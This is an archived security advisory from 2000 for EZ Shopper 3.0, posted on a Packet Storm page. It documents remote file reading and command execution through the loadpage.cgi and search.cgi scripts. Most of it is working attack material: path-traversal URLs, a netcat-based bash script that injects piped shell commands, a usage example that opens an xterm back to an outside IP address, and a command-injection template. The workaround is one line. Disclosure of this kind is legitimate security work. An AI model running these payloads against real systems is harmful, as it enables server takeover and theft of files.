exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

010.txt

010.txt
Posted Feb 28, 2000
Authored by Suid | Site suid.kg

SUID Advisory #10 - EZ Shopper 3.0 remote exploit. Anyone can execute any command on the remote system with the priveleges of the web server, and read any file on the remote system.

tags | remote, web
SHA-256 | 34f25822d0c29daeab945d4bb6017e10d3264a9d52550b4c41969e9cf382fd0d

010.txt

Change Mirror Download
suid@suid.kg - EZ Shopper 3.0 remote command execution.

Software: EZ Shopper 3.0
URL: http://www.ahg.com/software.htm#ezshopper
Version: Version 3.0
Platforms: Unix, NT
Type: CGI, Input validation problem
Vendor status: Notified 26/02/2000
Date: 26/02/2000

Summary:

Anyone can execute any command on the remote system with
the priveleges of the web server. Anyone can read any file
on the remote system which the webserver has access to.

Vulnerability:

The perl code does no input validation and performs an
open() on a user supplied input.

Exploit:

(1) loadpage.cgi - view any file.

Firstly using your web browser find the current path (cwd):

http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ

You will receive an error message like:

Cannot open file /home/www/shop/XYZ

Now simply use (example based on the above cwd):

http://www.example.com/cgi-bin/loadpage.cgi?
user_id=1&file=../../<path>/<file>

(2) loadpage.cgi - execute any command.

This example shell script uses netcat to communicate with a
HTTP proxy and exploit the script:

------------------------CUT------------------------

#!/bin/bash
echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?
user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080

------------------------CUT------------------------

A usage example would be:

$ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%
20123.123.123.123:0

(3) search.cgi - view files (retarded tho) and execute commands.

Simply replace the database field with piped commands or path/filename.

http://www.example.com/cgi-bin/search.cgi?
user_id=1&database=<insert here>&template=<or insert here>&distinct=1

Note if you use the database field a valid template is probably needed
and vice versa.

Workaround:

The vendor, AHG Inc, has released a fixed version, download it from
their website and install the fixed version.

Greets:

yowie
cr
active

http://www.suid.kg/advisories/010.txt

EOF



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close